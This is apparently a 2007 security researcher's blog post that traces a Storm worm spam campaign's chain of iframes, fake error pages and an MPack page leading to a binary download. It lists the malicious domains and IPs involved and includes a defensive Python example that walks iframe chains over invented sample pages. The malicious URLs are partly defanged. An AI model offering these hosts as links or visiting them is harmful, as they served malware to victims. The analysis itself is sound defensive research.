Stormworm - iframe hell.
This morning we started receiving dual language Storm worm Emails:
From: fuzzarnsjjvr@sdc-dsc.gc.ca (spaces and xx's added to protect from accidental clicks)
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me
Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/
Look what they're writing about you, you really are a bitch, everybody look! Here's the address
http:// bl0cker.info/ suki .php?new=pidori
The Russian suki.php page doesn't exist yet (404 error), but there is an index page, and it has JavaScript iframes pointing to:
http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4
The sid=1, sid=2 and sid=3 pages are all fake error pages with more iframes:
http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php
sid=4 is an encoded JavaScript page that tries to download http:// bl0cker.info /bn/exe.php
So how deep can it get? I followed the white rabbit through a few more links:
cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex
lem0n.info /xxx/iframe.php is JavaScript that points to http:// bl0cker.info /bn/index.php
lem0n.info /xxx/m/iframe.php returns a lot of PHP errors:
Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40
Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41
Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42
Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43
The same errors come back from http:// bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.
eliteproject.cn /ts/in.cgi?alex is an MPack page that points to http:// superengine.cn /1278/file.php (a binary file)
In summary, possible new Storm domains:
superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info
None of these are fast-flux, yet.
space-sms.info, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.
ns2.spektor.ws resolves to the same IP (58.65.239.66) as the A records for the new domains.
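Chains like the one above are easier to map with a bounded walker than by hand; the following is added example code, not from the original post, and it runs over constructed sample pages with invented domains, using a dictionary lookup in place of a live fetch. It follows static and script-written iframes as well as location redirects, stops on loops, and reports the hosts involved.

```python
import re
from collections import deque
from urllib.parse import urljoin, urlsplit

# iframe src (quoted, unquoted or inside a document.write string) and JS location redirects.
IFRAME_SRC = re.compile(r"""<iframe[^>]*?src=\\?["']?([^"'\\\s>]+)""", re.I)
JS_LOCATION = re.compile(r"""(?:window\.)?location(?:\.href)?\s*=\s*["']([^"']+)""", re.I)

def extract_links(base_url, body):
    """Return the next-hop URLs a page loads, absolute and deduplicated in order."""
    found = IFRAME_SRC.findall(body) + JS_LOCATION.findall(body)
    return [urljoin(base_url, f) for f in dict.fromkeys(found)]

def walk_chain(start_url, fetch, max_depth=6):
    """Breadth-first walk of the iframe/redirect graph. fetch(url) returns a body or
    None (404, binary, unreachable). The seen-set stops loops between pages that
    frame each other and max_depth bounds the walk. Returns (edges, hostnames)."""
    edges, hosts, seen = [], set(), {start_url}
    queue = deque([(start_url, 0)])
    while queue:
        url, depth = queue.popleft()
        hosts.add(urlsplit(url).hostname)
        body = fetch(url)
        if body is None or depth >= max_depth:
            continue
        for nxt in extract_links(url, body):
            edges.append((url, nxt))
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, depth + 1))
    return edges, hosts

# Constructed sample pages standing in for live fetches; every domain here is invented.
PAGES = {
    "http://lure.example/index.php":
        '<iframe src="http://gate.example/st/go.php?sid=1" width=0 height=0></iframe>'
        '<iframe src="http://gate.example/st/go.php?sid=4"></iframe>',
    "http://gate.example/st/go.php?sid=1":  # fake error page carrying another frame
        "<h1>404 Not Found</h1><iframe src='http://frame1.example/xxx/iframe.php'></iframe>",
    "http://gate.example/st/go.php?sid=4":  # script-written frame to the dropper
        "<script>document.write('<iframe src=http://drop.example/bn/exe.php width=0></iframe>')</script>",
    "http://frame1.example/xxx/iframe.php":  # points back at the start: a loop
        "<script>window.location='http://lure.example/index.php'</script>",
    "http://drop.example/bn/exe.php": None,  # binary payload, nothing to parse
}

def triage(start="http://lure.example/index.php"):
    return walk_chain(start, PAGES.get)
```

The hostnames returned are the candidate list to check against shared name servers and A records, as done above for the spektor.ws domains.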
Labels: CME711, Iframes, nuwar, peacomm, peed, Storm, xored javascript

1 Comments:
tibeam.com
ptowl.com
eqcorn.com
Storm domains slow but working at 4:43 PM Bangkok time (GMT+7)
Edgar from Bangkok
http://edetools.blogspot.com/